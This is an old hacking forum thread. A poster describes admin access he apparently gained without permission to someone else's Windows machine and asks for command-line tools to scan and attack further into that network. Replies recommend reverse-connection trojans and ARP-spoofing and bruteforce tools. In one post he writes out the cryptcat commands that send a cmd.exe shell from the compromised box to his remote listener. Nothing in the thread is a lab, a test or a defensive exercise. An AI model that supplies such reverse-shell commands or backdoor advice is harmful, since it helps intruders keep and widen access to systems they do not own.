Forums: Cmd Line Vscanners & Tools Needed For Xploited Box - Forums

Jump to content

Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

Cmd Line Vscanners & Tools Needed For Xploited Box

#1 User is offline   tolf 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 108
  • Joined: 22-September 03

Posted 03 December 2003 - 11:53 PM

Hello,

I have obatined admin access to a box and have a reverse cryptcat session polling back to my static IP every hour if the session dies.. ie i have Win32 cmd line access.

I can upload to the the server using TFTP on their server
I can establish outbound connection on any port but nothing in..

I have installed VNC and other remote-see-the-screens back door but for what ever reason this is not allowed and does not work so i need to do everything command line.. .<trust me I have tried many times and all possibilites>

I would like to go deeper into the network and scan other boxes and need CMD tools to do some vulnerability scanning.

Besides the basic port scanning and enumeration tools has anyone got any other new crafty CMD tools, ie bruteforce, ARPspoofing ( that doesnt need drivers to be installed (becuase i cant reboot or Ill loose the session) that could help and assist in my attack..

Regards,

Thanks.
0

#2 Guest_SKyLiNe_*

  • Group: Guests

Posted 04 December 2003 - 02:48 AM

Why not install a decent trojan, if you are not going to reboot that box,
im quite sure someone else will sooner or later :D
For cmdline portscanning u could just use nmap, for arp spoofing u can
compile wci by FX of phenoelit. There are various other tools incl. cmd line bruteforce tools whidely available on all the well known sec sites. :D
0

#3 Guest_fsb_*

  • Group: Guests

Posted 04 December 2003 - 03:22 AM

Look for a trojan that supports SIN (reverse connection) so that it connects to your ip rather than you having to open a port on that machine. It also sounds like you might need a trojan that does NAT traversal. Something like Lanfiltrator might work.
0

#4 User is offline   320X 

  • Master Sergeant
  • Icon
  • Group: Members
  • Posts: 473
  • Joined: 13-December 03

Posted 14 December 2003 - 07:38 AM

Use the new beast v 2.05 whit syn connection or taladrator trojan, and dont install the vnc, is much better the radmin
;)
0

#5 User is offline   realmasterX 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 111
  • Joined: 01-December 03

Posted 14 December 2003 - 07:51 AM

i think optix support reverse connection too..
back again.
0

#6 User is offline   320X 

  • Master Sergeant
  • Icon
  • Group: Members
  • Posts: 473
  • Joined: 13-December 03

Posted 14 December 2003 - 04:01 PM

if you want reverse conection use the new beast 2.05 whit his option syn port or taladrator ;)
0

#7 User is offline   tolf 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 108
  • Joined: 22-September 03

Posted 14 December 2003 - 05:16 PM

320X, on Dec 15 2003, 12:01 AM, said:

if you want reverse conection use the new beast 2.05 whit his option syn port or taladrator ;)

Beast looks good but from what I read you cant control the machine with the desktop GUI like VNC or PCanywhere.
0

#8 User is offline   GhostCow 

  • Sergeant First Class
  • Icon
  • Group: Members
  • Posts: 345
  • Joined: 20-September 03

Posted 14 December 2003 - 11:48 PM

why do you need to see the desktop? i mean isnt command line enough?
ps: can you please post the commands you used to make the reverse shell with cryptcat? thanks :)
0

#9 User is offline   tolf 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 108
  • Joined: 22-September 03

Posted 14 December 2003 - 11:59 PM

GhostCow, on Dec 15 2003, 07:48 AM, said:

why do you need to see the desktop? i mean isnt command line enough?
ps: can you please post the commands you used to make the reverse shell with cryptcat? thanks :)

Needed to install Winpcap drivers and other Utils that rely on gui..

commands are same as netcat:

To send back shell to listener on port 80:

Compromised box: cryptcat -e cmd.exe -v -p 80 <IP>

Remote Listener: cryptcat -L -vv -p 80
0

#10 User is offline   realmasterX 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 111
  • Joined: 01-December 03

Posted 15 December 2003 - 10:16 AM

mmm not optix supports the reverse connection,... assasin does.. ;)
back again.
0

#11 Guest_Axl_*

  • Group: Guests

Posted 15 December 2003 - 12:53 PM

%00@
he is right...
0

Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

1 User(s) are reading this topic
0 members, 1 guests, 0 anonymous users

  • Share



Our Sponsors:


SwiftLayer Affiliate Web Hosting